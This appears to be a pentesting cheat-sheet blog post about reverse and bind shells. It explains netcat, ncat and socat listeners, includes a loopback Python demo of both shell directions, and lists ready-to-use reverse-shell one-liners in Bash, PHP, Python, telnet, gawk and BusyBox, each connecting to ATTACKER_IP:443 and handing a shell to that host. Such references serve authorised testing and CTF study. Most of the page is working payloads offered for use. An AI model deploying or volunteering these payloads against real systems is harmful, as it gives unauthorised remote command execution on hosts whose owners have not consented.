Shells Overview
May 18, 2025

Reverse Shell
In a reverse shell the target connects back to us, so the first step is to start a listener on the attacking machine (the `nc -lvnp 443` from the Shell listeners section below) before anything is run on the target.

The second step is the payload itself: a command run on the target that opens a TCP connection to ATTACKER_IP:443 and attaches a shell's stdin, stdout and stderr to that socket. Per-language one-liners that do exactly this are collected under Shell payloads below.
Bind Shell

A bind shell turns the roles around: the target listens on a port with a shell attached to the socket, and we connect to that port with netcat from the attacking machine. Because the target has to expose a listening port, this only works when no firewall or NAT blocks inbound connections to it; when inbound traffic is filtered, fall back to a reverse shell, which only needs an outbound connection.
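To make the difference between the two directions concrete, here is an added example (not code from the original post) that plays both sides in one Python file, so you can see who calls listen() and who calls connect() in each case. It uses loopback (127.0.0.1) and an OS-chosen port instead of ATTACKER_IP:443 so it runs offline, and it attaches a plain `sh` rather than the `pty.spawn("bash")` of the Python payloads, since there is no terminal involved. The function names (`attach_shell`, `listen`, `drive`, the two `*_demo` helpers) are my own.

```python
import socket
import subprocess
import threading

# Loopback stands in for ATTACKER_IP / TARGET_IP so the demo runs offline;
# port 0 lets the OS pick a free port instead of the page's 443.
HOST = "127.0.0.1"


def attach_shell(sock):
    """Give `sh` the socket as fd 0, 1 and 2, which is what the
    os.dup2(s.fileno(), fd) for fd in (0, 1, 2) payloads on this page do.
    Popen performs the dup2() calls in the child for us."""
    proc = subprocess.Popen(["sh"], stdin=sock, stdout=sock, stderr=sock)
    sock.close()                       # the child keeps its own copy of the fd
    return proc.wait()


def listen(port=0):
    """Whoever plays the `nc -lvnp PORT` role: bind, listen, report the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, port))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def drive(conn, command):
    """The attacker's keyboard: send one command line, then read until the
    remote shell exits and the socket reaches EOF."""
    conn.sendall(command.encode() + b"\nexit\n")
    out = b""
    while True:
        chunk = conn.recv(4096)
        if not chunk:
            break
        out += chunk
    conn.close()
    return out.decode()


def reverse_shell_demo(command="echo reverse-ok"):
    """Reverse shell: the attacker listens first, the target dials out."""
    srv, port = listen()                                # attacker: nc -lvnp PORT

    def target():
        s = socket.create_connection((HOST, port))      # target: connect to ATTACKER_IP:PORT
        attach_shell(s)

    t = threading.Thread(target=target)
    t.start()
    conn, _ = srv.accept()                              # the shell "calls back"
    out = drive(conn, command)
    t.join()
    srv.close()
    return out


def bind_shell_demo(command="echo bind-ok"):
    """Bind shell: the target listens with a shell attached, the attacker dials in."""
    srv, port = listen()                                # target: nc -lvnp PORT -e sh

    def target():
        conn, _ = srv.accept()
        attach_shell(conn)

    t = threading.Thread(target=target)
    t.start()
    attacker = socket.create_connection((HOST, port))   # attacker: nc TARGET_IP PORT
    out = drive(attacker, command)
    t.join()
    srv.close()
    return out


if __name__ == "__main__":
    print(reverse_shell_demo(), end="")
    print(bind_shell_demo(), end="")
```

The only thing that changes between the two demos is which side owns the listening socket; `attach_shell` is identical, which is why every payload further down reduces to "get a connected socket, then point fds 0, 1 and 2 at it".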
Shell listeners

How can we enhance our shell experience? The listener side offers a few options:

- `rlwrap nc -lvnp 443`: wrapping netcat in rlwrap gives the otherwise raw session line editing, arrow keys and command history.
- `ncat` (the netcat that ships with Nmap) can encrypt the session with `--ssl`: `ncat --ssl -lvnp 443`. The payload side must then speak TLS too; a plain `/dev/tcp` or netcat payload will not work against an `--ssl` listener.
- `socat -d -d TCP-LISTEN:443 STDOUT`: a socat listener; the two `-d` flags print connection details to stderr so you can see who connected.
Shell payloads
Bash

All four rely on bash's `/dev/tcp` pseudo-device, so they must be run by bash itself; where `/bin/sh` is dash they fail with "No such file or directory".

```bash
# interactive bash: stdout and stderr to the socket, stdin from it
bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1

# read lines from fd 5 and run them one at a time (not an interactive shell)
exec 5<>/dev/tcp/ATTACKER_IP/443; cat <&5 | while read line; do $line 2>&5 >&5; done

# same idea on fd 196, handing the socket to sh
0<&196;exec 196<>/dev/tcp/ATTACKER_IP/443; sh <&196 >&196 2>&196

# open the socket on fd 5 and point 0, 1 and 2 at it
bash -i 5<> /dev/tcp/ATTACKER_IP/443 0<&5 1>&5 2>&5
```
PHP

Each variant opens the socket with `fsockopen()` and hands it to a shell as file descriptor 3; only the function used to launch the shell differs, which matters when some of them are blocked by `disable_functions`. The `<&3` trick assumes the socket is the first free descriptor, which holds for `php -r` in a fresh process but not necessarily inside a web server worker that already has files open.

```bash
php -r '$sock=fsockopen("ATTACKER_IP",443);exec("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("ATTACKER_IP",443);shell_exec("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("ATTACKER_IP",443);system("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("ATTACKER_IP",443);passthru("sh <&3 >&3 2>&3");'
php -r '$sock=fsockopen("ATTACKER_IP",443);popen("sh <&3 >&3 2>&3", "r");'
```
Python

Each one connects out, duplicates the socket onto fds 0, 1 and 2 with `os.dup2()`, then starts bash inside a pty so the shell behaves like a terminal (job control, prompts, programs that need a tty).

```bash
# read the target from the environment so the one-liner itself contains no address
export RHOST="ATTACKER_IP"; export RPORT=443; python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

# explicit dup2 calls, same effect
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'

# shortest form
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("ATTACKER_IP",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'
```
telnet

Useful on old hosts that have telnet but no netcat. What we type arrives on telnet's stdout and is piped into `sh`; the shell's output goes into the fifo, which is telnet's stdin, and is sent back to us. Note that stderr is not redirected, so error messages stay on the target.

```bash
TF=$(mktemp -u); mkfifo $TF && telnet ATTACKER_IP 443 0<$TF | sh 1>$TF
```
AWK

This needs gawk: both the `/inet/tcp` special file and the `|&` coprocess operator are gawk extensions, so mawk or the BusyBox awk will not run it. It is a command loop rather than a real shell: each line received is run as a coprocess and its output is written back to the socket, until the line `exit` is received.

```bash
awk 'BEGIN {s = "/inet/tcp/0/ATTACKER_IP/443"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```
BusyBox

Embedded devices and minimal container images often ship BusyBox instead of a full netcat. Its `nc` applet only accepts `-e` when the build includes the extra nc options, so check the usage text (`busybox nc` with no arguments) for `-e` before relying on it.

```bash
busybox nc ATTACKER_IP 443 -e sh
```